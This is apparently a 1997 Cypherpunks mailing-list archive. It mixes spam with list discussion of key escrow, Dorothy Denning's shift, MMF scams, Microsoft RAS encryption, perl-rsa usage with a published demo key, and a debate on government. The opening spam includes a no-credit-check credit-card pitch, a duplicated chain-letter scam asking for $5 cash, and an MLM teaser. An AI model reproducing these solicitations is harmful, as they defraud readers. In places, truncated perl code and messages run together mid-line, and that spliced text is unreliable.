From 23908678 at 17105.com Fri Aug 1 03:10:18 1997 From: 23908678 at 17105.com (23908678 at 17105.com) Date: Fri, 1 Aug 1997 03:10:18 -0700 (PDT) Subject: We pay You if we can't get you a VISA/MC! Message-ID: <198465134645.BAS64865@insideoutside.com> Hello! If you have bad credit, no credit, even bankruptcy, you can still obtain one or more VISA or MasterCards with NO SECURITY DEPOSIT or SAVINGS ACCOUNT REQUIRED! And NO CREDIT CHECK. Our Credit Matching service has helped hundreds of people become bankcard holders, and we can help you too! In fact, we if we can't get you approved!! This is that second chance you've been waiting for! Don't miss out! CLICK HERE TO APPLY FOR YOUR UNSECURED CREDIT CARD! You've nothing to lose! Our web page also provides you with a FREE LIST of companies offering merchant cards and banks that offer secured cards. (No monthly fees, no deposits, NOT MLM, and NO inquiries to your credit file). We thank you for your business! (This is a one time mailing. You won't hear from us again unless you request so) <<<>>><<<>>><<<>>><<<>>><<<>>><<<>>><<<>>><<<>>><<<>>><<<><< Tired of unsolicited email? Click here! <><><><><><><><><><><><><><><><><><><><><><><><><9><4><9><0> From 17096751 at 18377.com Fri Aug 1 04:07:10 1997 From: 17096751 at 18377.com (17096751 at 18377.com) Date: Fri, 1 Aug 1997 04:07:10 -0700 (PDT) Subject: I THINK I OWE YOU SOME MONEY!!! I WANT TO GIVE YOU SOME $$$ Message-ID: <6528754@freeguide.com>

I THINK I OWE YOU SOME MONEY!!! I WANT TO GIVE YOU SOME $$$

Dear Friend,

No, there isn't an error in the subject line! I think I owe you some money! I found an amazing way to make money, 
and it's so great I think everybody should use this method to become financially independent! 

Would you like to get into the action and get some of that money? How does $5,000 sound to you? That is, up to 
$5,000 just for photocopying a page of the information I am about to give you each and every time you copy. 
Sound good? How about this, I'm going to give you three pages which can help you make an immediate $15,000. 
Here's the best part, the pages I am about to give to you which provides this EASY way to make MONEY can 
be yours for ABSOLUTELY FREE!!!

Making $15,000 just for photocopying some information on three pages. It is definitely possible. There is 
ABSOLUTELY NO HARD WORK INVOLVED!!! Making money this easy shouldn't be legal, But I assure you,
it's TOTALLY LEGAL!

Why am I giving this incredible information for free? I know that these three free pieces of paper that I am about to 
send you can help stuff money into your pockets! I'm giving out these pages because I know that you'll be so
impressed with this system, you'll want to order my other money making materials. Because I already know that
 you'll love this system and will order others, I've decided to just flat out give you these three pages. You have 
NO OBLIGATION to buy in the future. But I'm telling you, it'll be like Christmas every time you go to your mailbox. 

Also, I will include another piece of paper that may help you make up to $8000, $160000, or even up to $3,200,000.
Again, all you have to do and press the start button on the photocopy machine.

Besides that, I will also send you a phone card which provides a great rate of 19 cents a minute. From anywhere to 
anywhere in the US, any time of the day. No restrictions. You can use this card to call New York from Seattle, or call 
Miami from San Diego. From a pay phone at the airport, at a friend's phone, hotel room phone or even a cell phone.
You can use this card and save with the great rate of 19 cents to anywhere in the US. You don't even have to change
 your long distance company.

You will get all this ABSOLUTELY FREE!!! To get all these great money making and money saving items. Please 
send your name and address, as well as $5 (five dollars) cash. You are getting everything for FREE, but the money 
is to help cover the cost of shipping and handling, which unfortunately isn't free. Besides, you can make the money back
in less than one push of the start button of the copy machine. And the phone card itself is worth more than that, in both
 savings and face value. So you have NOTHING TO LOSE!!!

So please send everything (You name, Address  and $5) to:-

Free Guide
PO BOX 180
Cypress, CA 90630

I THINK I OWE YOU SOME MONEY!!! I WANT TO GIVE YOU SOME $$$

Disclaimer:- Research shows that you maybe interested in this information. If you are not, you will not get this
letter again. If so, we are sorry to have inconvenienced you. 

Dear Friend,

No, there isn't an error in the subject line! I think I owe you some money! I found an amazing way to make money, 
and it's so great I think everybody should use this method to become financially independent! 

Would you like to get into the action and get some of that money? How does $5,000 sound to you? That is, up to 
$5,000 just for photocopying a page of the information I am about to give you each and every time you copy. 
Sound good? How about this, I'm going to give you three pages which can help you make an immediate $15,000. 
Here's the best part, the pages I am about to give to you which provides this EASY way to make MONEY can 
be yours for ABSOLUTELY FREE!!!

Making $15,000 just for photocopying some information on three pages. It is definitely possible. There is 
ABSOLUTELY NO HARD WORK INVOLVED!!! Making money this easy shouldn't be legal, But I assure you
, it's TOTALLY LEGAL!

Why am I giving this incredible information for free? I know that these three free pieces of paper that I am about to 
send you can help stuff money into your pockets! I'm giving out these pages because I know that you'll be so
impressed with this system, you'll want to order my other money making materials. Because I already know that
 you'll love this system and will order others, I've decided to just flat out give you these three pages. You have 
NO OBLIGATION to buy in the future. But I'm telling you, it'll be like Christmas every time you go to your mailbox. 

Also, I will include another piece of paper that may help you make up to $8000, $160000, or even up to $3,200,000.
Again, all you have to do and press the start button on the photocopy machine.

Besides that, I will also send you a phone card which provides a great rate of 19 cents a minute. From anywhere to 
anywhere in the US, any time of the day. No restrictions. You can use this card to call New York from Seattle, or call 
Miami from San Diego. From a pay phone at the airport, at a friend's phone, hotel room phone or even a cell phone.
You can use this card and save with the great rate of 19 cents to anywhere in the US. You don't even have to change
 your long distance company.

You will get all this ABSOLUTELY FREE!!! To get all these great money making and money saving items. Please 
send your name and address, as well as $5 (five dollars) cash. You are getting everything for FREE, but the money 
is to help cover the cost of shipping and handling, which unfortunately isn't free. Besides, you can make the money back
in less than one push of the start button of the copy machine. And the phone card itself is worth more than that, in both
 savings and face value. So you have NOTHING TO LOSE!!!

So please send everything (You name, Address  and $5) to:-

Free Guide
PO BOX 180
Cypress, CA 90630










From goldencareers.com at renoir.webservices.net  Fri Aug  1 09:17:29 1997
From: goldencareers.com at renoir.webservices.net (goldencareers.com at renoir.webservices.net)
Date: Fri, 1 Aug 1997 09:17:29 -0700 (PDT)
Subject: NEW ON THE NET
Message-ID: <>



NEW ON THE NET.

How would you like to have been part of the first group to join Amway in the 60s or
purchased stock from a small company called Wal-Mart in the 70s or had invested in a
small computer chip maker called Intel of the 80s.

Anybody that made these decisions above are sitting pretty good at the moment
Here in the 90s a new company, was launched on the net,   This young company has
positioned itself to be among the major players for years to come.

This is not a get rich scheme.

This is simply a new company, with fresh ideas, a new company that people are going to
hear a lot about.

If you would care to become a part of all the excitement, and learn more, just simply
send e-mail to sales at scarlett.org  Please put MORE INFO. in the subject field.You will
have info. vary soon.

THIS IS TRULY A COMPANY AHEAD OF IT'S TIME.

Thank You For Your Time.








From goldencareers.com at renoir.webservices.net  Fri Aug  1 09:17:29 1997
From: goldencareers.com at renoir.webservices.net (goldencareers.com at renoir.webservices.net)
Date: Fri, 1 Aug 1997 09:17:29 -0700 (PDT)
Subject: NEW ON THE NET
Message-ID: <>



NEW ON THE NET.

How would you like to have been part of the first group to join Amway in the 60s or
purchased stock from a small company called Wal-Mart in the 70s or had invested in a
small computer chip maker called Intel of the 80s.

Anybody that made these decisions above are sitting pretty good at the moment
Here in the 90s a new company, was launched on the net,   This young company has
positioned itself to be among the major players for years to come.

This is not a get rich scheme.

This is simply a new company, with fresh ideas, a new company that people are going to
hear a lot about.

If you would care to become a part of all the excitement, and learn more, just simply
send e-mail to sales at scarlett.org  Please put MORE INFO. in the subject field.You will
have info. vary soon.

THIS IS TRULY A COMPANY AHEAD OF IT'S TIME.

Thank You For Your Time.








From stewarts at ix.netcom.com  Fri Aug  1 00:43:47 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Aug 1997 15:43:47 +0800
Subject: uncensorable net based payment system?
In-Reply-To: <199707311240.NAA00742@server.test.net>
Message-ID: <3.0.2.32.19970731102641.006f3430@popd.ix.netcom.com>



At 01:40 PM 7/31/97 +0100, Adam Back wrote:
>The internet looks like it is slowly moving towards anonymous
>micropayments for services, and metering for scarce resources.
...
>That is to say high velocity efficient markets will arise for resale
>of bandwidth, storage and CPU hours.
.....
>The interesting question then is can we actually base an entirely net
>based currency on trading of these resources. 

It's not very stable, though it might be useful for short term
exchanges of value.  On the other hand, since demand for resources
is very bursty and constantly fluctuating, what we're more likely to see
is an agoric computing model of continuous auctions for some resources,
which allows pricing to reflect the near-instantaneous demand
(and therefore to fluctuate wildly, making it really useless as currency :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Fri Aug  1 00:46:40 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Aug 1997 15:46:40 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free  download)
In-Reply-To: <199707310103.CAA27631@server.test.net>
Message-ID: <3.0.2.32.19970731102244.006f3430@popd.ix.netcom.com>



At 10:36 PM 7/30/97 -0400, Ryan Anderson wrote:
>"Make Money Fast" are killed because they're illegal scams in the US and I 
>think in most of the world.

They're illegal in the US primarily because the Post Office is confused
about whether its job is to deliver the mail or to censor it,
and delivery of MMFs by mail is policed by Postal Inspectors just as
delivery of obscenity by mail is.  It's a side effect of having services
provided by a government monopoly rather than the free market,
though I'm sure that to some extent it's because people started 
complaining to the Post Office that they were receiving junk mail,
and complaining to their legislators that they lost money on these scams.

On the Internet, on the other hand, not only is the stuff spam and a scam,
but it's abusing flat-rate prices for service, and service providers
don't like it.  Julf's remailer used to block MMFs.

Pyramid scams like the MMF, and the government's inability to deal with it,
brought down the Albanian government recently.  Here in the US that would
_never_ happen (:-), assuming of course you don't consider Social Security
to be a Ponzi scheme....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Fri Aug  1 00:46:48 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Aug 1997 15:46:48 +0800
Subject: Dorothy Denning changes Escrow position
Message-ID: <3.0.2.32.19970801003421.007786bc@popd.ix.netcom.com>



There was an article in today's San Jose Mercury News that
Dorothy Denning, the leading academic supporter of the Administration's
anti-crypto stance, has backed off from that position.
She's put out a paper along with William Baugh of SAIC (!) which 
among other things includes a survey of law enforcement officers
on how much they've encountered crypto and how much difference it's made,
and the answer has been that it hasn't made much difference --
of the few criminals who use crypto, some use wimpy algorithms,
some are careless with their password handling, some get fingered by
stool pigeons, and some mainly use their crypto for information
not relevant to the case they're being investigated for.
She's now taking a much less certain, more neutral position.
Way to go, Dorothy!

It's especially important because Dr. Denning was the main independent
supporter of encryption limitations, and has a lot of reputation invested
in it, so changing her position is a big step.  The FBI has a vested
interest - without Communists to chase around, Director Freeh is off 
chasing drug dealers in the name of "national security".  And the 
industrial support for key escrow has primarily been from companies that 
get to export their products in return for adding it, though there have 
been a few firms like TIS that have developed it for its own sake.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From stewarts at ix.netcom.com  Fri Aug  1 00:50:13 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Fri, 1 Aug 1997 15:50:13 +0800
Subject: Rep. White introduces Internet Protection Act
In-Reply-To: <199707311411.HAA18283@toad.com>
Message-ID: <3.0.2.32.19970731094719.006f3430@popd.ix.netcom.com>



At 10:12 AM 7/31/97 -6, Peter Trei wrote:
>Does the FCC charter mention photonic communications as 
>well? At what point does the charter allow them to 
>interfere? Here's some steps on the way...
>
>* A mime, 'working' outdoors in daylight.
>The communication is entirely by photons, and the light
>source is non-electronic. (I know that many people
>would like to see mimes suppressed for the good of 
>humanity, but bear with me).

"A mime is a terrible thing to waste."

>* A mime, working by electric light.
>
>Does the fact that electricity is involved in
>creating the light make the communication 
>'electronic'? I don't think so. 

Electrical, perhaps; electronic, no, unless the light is using
transistors or vacuum tubes for some reason.

A mime, working under a government-funded streetlight,
which is powered by electricity obtained from interstate commerce .....
Sure, we can regulate that!  :-)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From vin at shore.net  Fri Aug  1 00:55:56 1997
From: vin at shore.net (Vin McLellan)
Date: Fri, 1 Aug 1997 15:55:56 +0800
Subject: Denning backs away from GAK
In-Reply-To: <199707311754.MAA21360@mailhub.amaranth.com>
Message-ID: 



	Tim May  rejected reports of D. Denning's change of
heart:

>And her "second thoughts" on GAK were not based on a principled repudiation
>of the concept of "escrowing" keys, or on Constitutional grounds,  but only
>on the grounds that her study did not show that many criminal cases were
>much affected by the lack of key escrow.
>
>So what if they had?
>
>(Insert usual arguments here about how many consitutionally-protected
>rights affect criminal investigations, but that this is no reason to ban
>window shades, locks on doors, whispering, etc.)
>
>Denning and her allies can always support GAK in the future, when "new
>studies indicate that law enforcement is being severely hampered by the
>growing menace of unbreakable cryptography."
>
>I never trust utilitarian arguments on things of this importance.

	To note the obvious, the Constitutional argument cuts both ways,
with warranted access to "private papers," versus the Founding Fathers'
proto-privacy and their rude distrust of federal power.  (It's kind of like
the abortion debate, where the premise you start off with almost dictates
which conclusion you arrive at, many steps later.)  Denning's pragmatic,
utilitarian, arguments are useful, but I suggest they mask a deeper shift
of primacy among competing principles.

	Utilitarian arguments are historically (even in C'punks;-) used to
defend a pre-defined philosophical position.  (And anyone who thinks that
it would have been hard to tilt the Denning/Baugh study with reports of
crypto use by drug cartels and distributors, even within the US, is just
out of touch.)

	Of course, crypto has (and will in the future) muck up criminal
investigations!

	On the evidence her comments over the past four months, I think it
is clear Prof. Denning has had some profound second thoughts about ultimate
cultural values and the balance of power between the state and the
individual.   (Make your appointment, Declan! When Dorothy is ready to talk
about this, it will be _very_ interesting.)  Denning, like many on the
other side, is smart & idealistic.  This study and other recent statements
have her overtly balking at being herded along the pro-GAK path... at the
very time the US LEA chiefs are twisting every arm they can to demonize
free access to strong crypto.  That proves her to be thoughtful as well.
Not many standard-bearers cross from one side to the other in this debate.

	Dennings refusal to offer rote support for the LEAs now is itself a
major event in this debate, with significant implications in Congress.

	For players who operate at the level Denning has worked, I have a
gut sense that the international issues -- the multi-cultural,
multi-national, Merchantile side of the debate -- are often much more
important than they have been in the Stateside discussion, such as it is.

	Restructuring world commerce around "licenses" from various
national spy organizations is a disconcerting prospect for many, with
widely-varied political identities.  Also, Denning's middle-class trust in
American government agencies doesn't have a direct parallel in European
political culture -- and once people notice that, the contrasting views of
the state are often disconcerting.

	(Most countries, even in Europe, vividly recall foreign occupation
-- which gives a notable tweak to presumptions of bureaucratic Virtue.)

	Dorothy Denning will never march under a Libertarian flag, but
neither will I. There are other banners which are on the same side of the
barricades, guys.  No need to shoot all your allies until after the
Revolution.  And, if we win it together, you may need a consensus before
anyone shoots anyone, AP notwithstanding;-)

	Suerte,
		_Vin

"Cryptography is like literacy in the Dark Ages. Infinitely potent, for
good and ill... yet basically an intellectual construct, an idea, which by
its nature will resist efforts to restrict it to bureaucrats and others who
deem only themselves worthy of such Privilege."
_ A thinking man's Creed for Crypto/ vbm.

 *     Vin McLellan + The Privacy Guild +     *
  53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548







From Michael.Johnson at mejl.com  Fri Aug  1 01:31:28 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Fri, 1 Aug 1997 16:31:28 +0800
Subject: Microsoft RAS encryption?
Message-ID: <3.0.3.32.19970801101506.0092b420@localhost>




Does anybody know how Microsoft RAS implements data encryption? Apparently
(http://www.microsoft.com/kb/articles/q136/6/34.htm) they use RC4, but is
this stuff documented somewhere, like in an RFC?


Mike.






From dformosa at st.nepean.uws.edu.au  Fri Aug  1 01:41:45 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 1 Aug 1997 16:41:45 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free   download)
In-Reply-To: <3.0.2.32.19970731102244.006f3430@popd.ix.netcom.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 31 Jul 1997, Bill Stewart wrote:

[...MMF...]

> though I'm sure that to some extent it's because people started
> complaining to the Post Office that they were receiving junk mail,

The MMF ban came about when its volume rose to a point where it crashed
californaia's snail mail system.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+FkeKQK0ynCmdStAQHCzwQAmr60ZmnFX0e+bsd/TIyeEFfBdVwJoIwC
TMaiup70Qq0Lj5gFsCV6TsX8OlA6oIjxSzUQSrYqOM9agXf2vw8uG4KTeBft8Lsf
16Yfs40C3Py96KWaYoKLzhDRpxvq//6QUxkLUwra306ol1EcCnhF/YEu4JTrhXm4
+9lXf8TMLlY=
=Tl5N
-----END PGP SIGNATURE-----






From frogfarm at yakko.cs.wmich.edu  Fri Aug  1 01:52:35 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Fri, 1 Aug 1997 16:52:35 +0800
Subject: Self-imposed censorship
Message-ID: <19970801044418.63467@yakko.cs.wmich.edu>



>There are a great many ironies here, but the greatest
>irony is that the censorship will be self-imposed --
>we're doing it for the sake of family, parents,
>children.

"Arresting Katherine was the government's way of taping our mouths
shut. Yet they had to realize that beating heads was the last way to
tame minds. Benevolence was always the first choice of rule for our
ancient emperors. The goal was to make people obey with their hearts
instead of with their mouths."
 -_Katherine_, by Anchee Min

"Ye have locked yerselves up in cages of fear - and behold, do ye
now complain that ye lack FREEDOM!"
 - _Principia Discordia_

It is not enough to fear Big Brother. You must love him.

--
"There's no way the federal government could oppress the citizens, because
the populace is armed to the teeth, and the officials would just get their
heads blown off."
 - James Madison argues the pro-government position, Federalist Papers #46






From aba at dcs.ex.ac.uk  Fri Aug  1 03:47:16 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Fri, 1 Aug 1997 18:47:16 +0800
Subject: using perl-rsa
Message-ID: <199708011035.LAA01061@server.test.net>




[managed to type kent instead of keng this time, touch typist and not
watching the screen either].

Kent Crispin  writes:
> [...]
> 
> >print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> >)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 
> BTW, how do you use this code?  I'm not a big "dc" user, I must admit.

You first of all extract your a PGP key with pgpacket.  (You'll need
to change the password to be no password (press enter when prompted
for password), so that PGP doesn't encrypt the private key.

Next, you can do:

	% perl rsa.pl [e] [n] < plaintext > ciphertext
	% perl rsa.pl [d] [n] < plaintext > ciphertext

to encrypt and decrypt.

Here's a small example (Fred is a notional eternity user who's key,
both public and private is included in the eternity distribution):

Fred's public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQBNAzPfUPsAAAECAMn6jtL3ZNjmBrkDLIktHNmBGc+a59BSvFPN8howj5zAj1U8
5QOfVtV4kOliK2AkCcL2yyz3Wz+AHiYdVyuQJF0ABRG0FEZyZWQgPGZyZWRAZXRl
cm5pdHk+iQBVAwUQM99Q/B4mHVcrkCRdAQECQQH/YZqss3VQZwZi5KfylAzFOnz8
/pXOSh8Rf9pTsF2TbsAKIK4xL9PzYoicy/KAZdIN+AJO8dX/xY0a1v5A8xobeg==
=iWoN
-----END PGP PUBLIC KEY BLOCK-----

Fred's secret key (no password):

-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.3i

lQD4AzPfUPsAAAECAMn6jtL3ZNjmBrkDLIktHNmBGc+a59BSvFPN8howj5zAj1U8
5QOfVtV4kOliK2AkCcL2yyz3Wz+AHiYdVyuQJF0ABREAAfsEPkWwiGybJRn00/dB
RLZjOZHAmMRVDH6UC9si+GpHDsOs5/eLbK6GUqmbWXG4I4LadxRQz/nplQ+lCVYP
ecrbAQDixLjtXlj9ks1e9ZcroU71Pvk84oQjpUhiU1rAIkKh9wEA5APIvVJETEjm
DxEpdE6hJkty+nb6v8VNOYlslo8Ol0sA/iwRycjjcNs4A2c9Owt+xLCiMp2JIb0z
yf7d4xEcLI1vUXG0FEZyZWQgPGZyZWRAZXRlcm5pdHk+
=CHwS
-----END PGP SECRET KEY BLOCK-----

(to extract public key do:

% pgp -kxa fred fredpub ~/.pgp/pubring.pgp 

and to get private key do:

% pgp -kxa fred fredpri ~/.pgp/secring.pgp 

)

Next get pgpacket.pl, see ftp://ftp.ox.ac.uk/pub/crypto/pgp/utils/ or
something like that.

Then run pgpacket on the fredpri.asc (it contains all the info that
you want, without looking at fredpub.asc, ie the values for e, d and
n):

% pgpacket fredpri.asc

The values for e, d, and n are:

e = 11
d = 043E45B0886C9B2519F4D3F74144B6633991C098C4550C7E940BDB22F86A470E
    C3ACE7F78B6CAE8652A99B5971B82382DA771450CFF9E9950FA509560F79CADB
n = C9FA8ED2F764D8E606B9032C892D1CD98119CF9AE7D052BC53CDF21A308F9CC0
    8F553CE5039F56D57890E9622B602409C2F6CB2CF75B3F801E261D572B90245D

Now you can encrypt for fred like so:

% echo hello world | perl rsa.pl 11 C9FA8ED2F764D8E606B9032C892D1CD98119CF9AE7D052BC53CDF21A308F9CC08F553CE5039F56D57890E9622B602409C2F6CB2CF75B3F801E261D572B90245D > hello.rsa
%

and to decrypt:

% perl rsa.pl 043E45B0886C9B2519F4D3F74144B6633991C098C4550C7E940BDB22F86A470EC3ACE7F78B6CAE8652A99B5971B82382DA771450CFF9E9950FA509560F79CADB C9FA8ED2F764D8E606B9032C892D1CD98119CF9AE7D052BC53CDF21A308F9CC08F553CE5039F56D57890E9622B602409C2F6CB2CF75B3F801E261D572B90245D < hello.rsa
hello world
%

Now dc can do modular exponentiation like so (reverse polish notation):

dc> m e ^ n %

but that's going to take a long time because it will evaluate m ^ e
and then do mod n.

So the clever thing that the program does is to implement Knuth's
modexp algorithm which reduces the work factor immensly. 

Actually GNU dc 1.1 (distributed with GNU bc-1.04) now includes "|" as
a modular exponentiation operator, so you can do: "m e n |" and it'll
do it directly.  This feature was a special, just for perl rsa because
Ken Pizzini, author of GNU dc, happens to be one of the major
contributors of hacks to shorten the perl program, and so have a
vested interest.

With the dc 1.1 | operator, Ken got the script down to:

$/=$z;exec"dc -e'16i0[lN*lMlKlN|+lMlN/dsM0]}\EsMsKsNx[II*~aSad0
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 I dug out a midi interpreter I wrote a number of years ago, 
> and it is indeed trivial to modify it to read any text as input.  
> Unfortunately, I wrote that long before the midi file spec was 
> finalized, and the hardware I wrote it for is also long gone.  But 
> it's probably not much work to get file output working again...and 
> the thought of a general text-to-midi translator is rather 
> entertaining -- I could play this entire mail message through it, for 
> example... It would definitely make better music if some rhythmic 
> variation was part of the coding, but that would make it a little 
> harder to make an automatic decoder...

I'd find it most cool to hear an audio file of the above.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708011032.LAA01054@server.test.net>




Kent Crispin  writes:
> On Thu, Jul 31, 1997 at 09:59:37PM +0100, Adam Back wrote:
> > Kent you seem to harbor the belief that government monopoly is a good
> > thing, or at least that government is somehow an unavoidable necessary
> > evil.
> 
> Adam, in all honesty I don't think of it like that at all. 
> "Government" to me is a completely neutral abstract term, like
> "organization", or "society".  

Isn't that a bit humpty dumpty words mean what I say they mean-ish?
Clearly my use of the word government above is intended to mean your
or my government.  If I was in the US I might have used the term USG,
but as I'm not I generalised to governments, meaning existing
governments of countries.  Government has other dictionary meanings.

> Consequently, a statement like "Government is always bad" is ipso
> facto a shallow generalization, and my natural reaction is to point
> out that sometimes government is good.

I'll admit there are situations where a government may make a good
decision, or handle a situation not too badly, or not that
restrictively.  Such situations are quite rare though, aren't they :-)

> Since the poor brainwashed souls on cypherpunks uniformly spout the
> "Government is bad" party line, the result is that comes out looking
> like I think government is good.  But that is an incorrect
> impression.  Government, as a general abstract term, is neither bad
> or good.

All words are neutral as abstract terms, it's only when you consider
the semantics of your intended meaning in using them in given contexts
that they become other than abstract.

Nuclear bomb is an neutral term.

> [Note: While "government" in general is a completely neutral term,
> particular governments may be better or worse in various dimensions,
> of course.  But it is never a black or white thing.  

Didn't say otherwise.  I gave the example of the ex Soviet Union as a
worse, more restrictive government than either US or UK government in
the post you are replying to.

> I don't think of government as a "necessary evil", either.  Rather,
> I think that a government of some kind is an inevitable outgrowth of
> human nature.  I think this for three compelling reasons: first, it is
> obversationally true -- there are essentially no human beings who live
> without a government of some kind; second, because it is in agreement
> with all my observations and knowledge of human nature; and third,
> because it makes sense to me as the rational consequence of the
> existence of force as an interpersonal interaction. 

As a general rule: less government intervention is more efficient than
more.  This is because the free market is better at meeting people's
demands in a tailored fashion than any socialist/communist planned
economy handed down by a few big-wigs.

Are you against privatisation?  Are you against deregulation?

I suppose you'd like to unreform the US telco's and put it back into
one huge monopoly charging monopoly rates?  Clearly US telco's have a
long way to go in terms of having a free competitive arena with FCC
intervention, but surely you aren't denying the improved efficiency
the deregulation you have had has produced.

It's not black or white.  (Where did I read that sentence, hmmm).

In the UK we have a socialist state.  Government provides a huge
social security system.  They have cut back on it a bit in the last 20
years, but it's still a disgrace the way money is wasted.
Nationalised medical care, all out of your tax bill.  No wonder the
tax rate is > 50% effective.  Some scandinavian countries are up in
the 60 and 70% effective tax range.

Would you like some of that in the US?  At least you currently have
mostly privatised medical care.

My point is really that the more market freedom, more deregulation,
less government intervention, less attempts to influence the market
the better off we'll all be.

Do you think it would be a good thing if the government started taxing
Internet usage?

> In fact, of course, the US generates a great deal of wealth for its
> citizens, who are among the best off and most productive of any nation
> on earth.  Of course it could be better, but it could be a whole lot
> worse.  To say that the form of government had nothing to do with that
> *success* is intellectually dishonest -- one can just as easily argue
> that things are good in the US largely *because* we have a relatively
> good government. 

Jeez, just imagine how much better off you could be without all the
government crapola.

> > The success that a country does enjoy is pretty much proportional to
> > the degree of market freedom.  Luckily for us our governments have
> > left a bit of freedom in markets, or we would have food shortages, and
> > rationing.
> 
> Oh, "luckily".  No possibility that there was intelligence involved,
> eh?

Maybe a bit of self-interest :-) Eg if the cancerous growth stifles
too much trade, it might get less tax revenues.  I view Clinton's
recent "hands off" approach to the internet in this light, if he
actually means anything concrete by it.

> [...]
> > Governments tend to grow, and soak up larger tax percentages, and
> > encroach into more aspects of life which were previously a question of
> > free choice, or were previously purely market driven.  The reason for
> > this growth is due to the government as an entity unconciously
> > promoting itself as an organism.  A great huge cancerous growth which
> > has us by the jugular.
> 
> "Governments" is the wrong term here.  A more correct term would be 
> "bureaucracies."   The growth you describe is endemic to any large 
> human organization.  Large corporations go through very similar 
> cycles.  Charities, churches, clubs -- it happens everywhere.  

Governments too.  ie what I said was true for governments so why
contest the fact?  So there are other systems it is true for, so what?
I didn't say there weren't.

> > A good start would be a choice in government, to generate some
> > competition.  So you can buy membership in a protection racket, hire
> > the services of a private security firm, or buy insurance from an
> > insurance group because of its benefits package, or go elsewhere if
> > the offering sucks.  You choose on an individual basis what package
> > best suits you, and you choose the service providers who you consider
> > as the best value for money.
> 
> This is a pure pipe dream, a utopian fantasy for libertarians.  I 
> could say "a good start would be for everyone to love one another" -- 
> it would be just as real.

OK, lets start with deregulation, and privatisation of everything that
it is immediately possible to arrange.  Not so radical is it?

You aren't going to get a purely market based economy with no
government intervention over night, clearly.

> > eg. I can go buy into Uncle Enzo's pizza delivery and protection
> > racket because the protection is 5000% better value for money than the
> > Feds deal.
> 
> How do you get out from Uncle Enzo's protection racket when things go 
> sour, if Uncle Enzo doesn't allow his customers to leave, or even to 
> say anything bad about him?

Sounds remarkably similar to the current situation doesn't it?

Anyway you just buy into Mr Lee's New Hong Kong protection racket, and
Uncle Enzo will respect Mr Lee's fire-power enough to consider it not
worth the effort of picking on small fry like you.

> You are describing pure speculative fantasy, and it is pointless to
> argue the details of your speculation.  All I can do is point out that
> it *is* a speculative fantasy, and challenge you to produce something
> meaningfully concrete.  Show me a real living example of such a
> society in operation.  

It's not black and white.  It's not all or nothing.  We can start with
less government, before it shrivels up to close to zero.

> If such an excellent society existed then surely people would flock
> to it in droves.  Or is it like communism -- we have to have the
> whole world under control before the dictatorship of the proletariat
> withers away, and the glorious new world order flowers?

Cultural and societal change have happened in the past.  I guess
you've read of the feudal systems.  Well society's structure has
changed.  If you lived in feudal systems, you'd be one of the serfs
happy with his lot tithing to the lord of the manor, and to the fat
church, and being left with barely enough to eat.

Clearly presures exist today where people would like to move to
different regimes.  People are real keen to get out of less free
governments into freer ones.  I won't bother with examples, anyone can
come up with those.

See anything wrong with making a currently relatively free government
into an even less restrictive government?

> No, I think that average people have much more sense than you give
> them credit for, and that the egotism of people who are bright
> technically frequently blinds them to their shallow understanding of
> other areas.  I have seen very bright people caught up in all sorts of
> insane ideas.  

Tell me, are the following insane ideas:

	- privatisation
	- deregulation
	- devolution of government power to smaller power bases
	- lower taxes
	- fewer politicians
	- reduced social security system 
	- cancel the war on drugs

> The best example I know is the weapons physicist, a brilliant and
> clever thinker, who is a member of a fundamentalist Christian group.
> He predicted the second coming on a particular day, and announced it
> to the press, with a statement to the effect that he had set off
> bombs at the Nevada test site with less intellectual certainty than
> his prediction.  I'm sure he is now back reading the the Bible and
> other texts, and trying to figure out what went wrong.

That suggests to me that he is slightly cracked, as well as being a
inventive physicist.

> I admire his conviction, his tenacity, but not his grip on reality. 

Yup, cracked.

> > Free choice makes for much more efficiency in terms of economics, and
> > in terms of individuals happiness.
> 
> Sure.  So what.  The issue is what *real* can be done.  Utopian 
> fantasies don't do it.

